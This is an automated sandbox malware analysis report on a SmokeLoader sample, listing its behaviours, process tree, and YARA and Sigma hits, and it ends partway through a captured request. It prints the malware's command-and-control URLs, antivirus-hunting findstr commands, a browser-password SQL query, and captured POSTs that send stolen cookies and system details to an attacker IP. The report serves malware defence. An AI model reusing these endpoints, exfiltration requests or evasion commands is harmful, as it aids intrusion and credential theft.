Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1473147
MD5:1aae19c81605bf0a5851e42e3574a83c
SHA1:ba91bcc371d24ba57458ba4a2aa82bc83447a129
SHA256:7c7cded8d1c0784881859ed03340d81c24ea9bf5d9972963cedf0e40b9856a0c
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to steal Chrome passwords or cookies
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with a suspicious file extension
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Leaks process information
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries Google from non browser process on port 80
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4764 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1AAE19C81605BF0A5851E42E3574A83C)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 9CFE.exe (PID: 5812 cmdline: C:\Users\user\AppData\Local\Temp\9CFE.exe MD5: C71D322F4A1D526CC0E5B3E010C184BE)
        • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 3784 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5808 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 4432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 4764 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 4180 cmdline: cmd /c md 78801 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 6676 cmdline: findstr /V "rapidconfidentialityspokedrill" Thanks MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3496 cmdline: cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Later.pif (PID: 2820 cmdline: 78801\Later.pif 78801\B MD5: B06E67F9767E5023892D9698703AD098)
          • timeout.exe (PID: 2508 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Later.pif (PID: 6584 cmdline: C:\Users\user\AppData\Local\Temp\78801\Later.pif MD5: B06E67F9767E5023892D9698703AD098)
  • wjshsfa (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\wjshsfa MD5: 1AAE19C81605BF0A5851E42E3574A83C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x719e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 8 entries
      SourceRuleDescriptionAuthorStrings
      19.2.Later.pif.1400000.1.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x1127f0:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x11b3fc:$string2: API call with %s database connection pointer
      • 0x11bf50:$string3: os_win.c:%d: (%lu) %s(%s) - %s
      19.2.Later.pif.1400000.1.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x1117f0:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x11a3fc:$string2: API call with %s database connection pointer
      • 0x11af50:$string3: os_win.c:%d: (%lu) %s(%s) - %s

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wjshsfa, CommandLine: C:\Users\user\AppData\Roaming\wjshsfa, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wjshsfa, NewProcessName: C:\Users\user\AppData\Roaming\wjshsfa, OriginalFileName: C:\Users\user\AppData\Roaming\wjshsfa, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\wjshsfa, ProcessId: 4500, ProcessName: wjshsfa
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\9CFE.exe, ParentImage: C:\Users\user\AppData\Local\Temp\9CFE.exe, ParentProcessId: 5812, ParentProcessName: 9CFE.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, ProcessId: 6396, ProcessName: cmd.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4764, ProcessName: findstr.exe
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://gebeus.ru/tmp/index.phpAvira URL Cloud: Label: malware
      Source: https://mussangroup.com/wp-content/images/pic1.jpgAvira URL Cloud: Label: malware
      Source: http://cx5519.com/tmp/index.phpAvira URL Cloud: Label: malware
      Source: http://office-techs.biz/tmp/index.phpAvira URL Cloud: Label: malware
      Source: http://evilos.cc/tmp/index.phpAvira URL Cloud: Label: malware
      Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
      Source: C:\Users\user\AppData\Roaming\wjshsfaReversingLabs: Detection: 34%
      Source: file.exeReversingLabs: Detection: 34%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\wjshsfaJoe Sandbox ML: detected
      Source: file.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01412D70 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,19_2_01412D70
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01415030 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,GetFileAttributesA,__Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,19_2_01415030
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014113C0 CryptUnprotectData,19_2_014113C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01411760 __Xtime_get_ticks,omp_get_thread_num,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CopyFileA,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,BCryptDecrypt,CryptUnprotectData,SetFileAttributesA,DeleteFileA,19_2_01411760
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49727 version: TLS 1.2
      Source: Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb+ source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004062D5 FindFirstFileW,FindClose,7_2_004062D5
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00402E18 FindFirstFileW,7_2_00402E18
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406C9B
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00C5C16C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C547B7 GetFileAttributesW,FindFirstFileW,FindClose,19_2_00C547B7
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5CB81 FindFirstFileW,FindClose,19_2_00C5CB81
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00C5CC0C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00C5F445
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00C5F5A2
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C53B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00C53B4F
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C53E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00C53E72
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01410730 FindFirstFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,19_2_01410730
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01410810 FindNextFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,19_2_01410810
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014FB7D0 _vcomp_for_static_simple_init,GetFileAttributesA,_vcomp_for_static_end,_vcomp_for_static_simple_init,GetFileAttributesA,FindFirstFileW,CreateFileA,GetFileSize,ReadFile,CloseHandle,FindNextFileW,FindClose,_vcomp_for_static_end,19_2_014FB7D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014F2001 FindFirstFileExW,19_2_014F2001

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 186.101.193.110 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Source: Malware configuration extractorURLs: http://evilos.cc/tmp/index.php
      Source: Malware configuration extractorURLs: http://gebeus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://office-techs.biz/tmp/index.php
      Source: Malware configuration extractorURLs: http://cx5519.com/tmp/index.php
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifHTTP traffic: POST /sendcookies HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 368 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 73 55 4c 50 4c 7a 68 53 78 2d 46 2d 36 77 4f 67 34 0d 3c 41 4e 44 3e 63 6f 75 6e 74 3d 32 Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2
      Source: global trafficHTTP traffic detected: POST /connect HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 61Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 76 65 72 73 69 6f 6e 3d 74 65 73 74 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&version=test
      Source: global trafficHTTP traffic detected: POST /osinfo HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 316Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6f 73 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 2d 62 69 74 26 6c 61 6e 67 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 26 6c 61 6e 67 73 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 26 6e 61 6d 65 3d 68 61 72 64 7a 26 61 64 6d 69 6e 3d 46 61 6c 73 65 26 63 70 75 3d 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 34 20 43 6f 72 65 73 26 73 69 7a 65 78 3d 31 32 38 30 26 73 69 7a 65 79 3d 31 30 32 34 26 72 61 6d 3d 34 32 39 33 39 37 31 39 36 38 26 76 69 64 65 6f 3d 55 45 58 38 37 20 7c 20 52 41 4d 3a 20 31 30 37 33 37 34 31 38 32 34 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&os=Microsoft Windows 10 Pro 64-bit&lang=English (United Kingdom)&langs=English (United Kingdom); English (United Kingdom); &name=hardz&admin=False&cpu=Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 4 Cores&sizex=1280&sizey=1024&ram=4293971968&video=UEX87 | RAM: 1073741824
      Source: global trafficHTTP traffic detected: POST /defenders HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 72Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Windows Defender
      Source: global trafficHTTP traffic detected: POST /browsers HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 211Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 7c 20 76 65 72 2e 20 31 31 38 2e 30 2e 31 2e 38 36 37 30 3b 0d 0a 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 3b 0d 0a 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 7c 20 76 65 72 2e 20 31 31 2e 30 2e 31 39 30 34 31 2e 31 35 36 36 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Mozilla Firefox | ver. 118.0.1.8670;Google Chrome | ver. 117.0.5938.132;Internet Explorer | ver. 11.0.19041.1566;Microsoft Edge | ver. 117.0.2045.47;
      Source: global trafficHTTP traffic detected: POST /softwares HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 303Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 55 70 64 61 74 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 57 65 62 56 69 65 77 32 20 52 75 6e 74 69 6d 65 3b 0d 0a 4a 61 76 61 20 41 75 74 6f 20 55 70 64 61 74 65 72 3b 0d 0a 4a 61 76 61 20 38 20 55 70 64 61 74 65 20 33 38 31 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 32 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 34 2e 33 36 2e 33 32 35 33 32 3b 0d 0a 4f 66 66 69 63 65 20 31 36 20 43 6c 69 63 6b 2d 74 6f 2d 52 75 6e 20 45 78 74 65 6e 73 69 62 69 6c 69 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Google Chrome;Microsoft Edge;Microsoft Edge Update;Microsoft Edge WebView2 Runtime;Java Auto Updater;Java 8 Update 381;Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532;Office 16 Click-to-Run Extensibility Component;
      Source: global trafficHTTP traffic detected: POST /proccesses HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 24746Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 70 72 6f 63 65 73 73 65 73 3d 49 44 3a 20 30 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 2c 20 4e 61 6d 65 3a 20 52 65 67 69 73 74 72 79 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 33 33 32 2c 20 4e 61 6d 65 3a 20 73 6d 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 32 30 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 39 36 2c 20 4e 61 6d 65 3a 20 77 69 6e 69 6e 69 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 35 30 34 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 35 36 34 2c 20 4e 61 6d 65 3a 20 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 36 33 32 2c 20 4e 61 6d 65 3a 20 73 65 72 76 69 63 65 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 36 34 30 2c 20 4e 61 6d 65 3a 20 6c 73 61 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 35 32 2c 20 4e 61 6d 65 3a 20 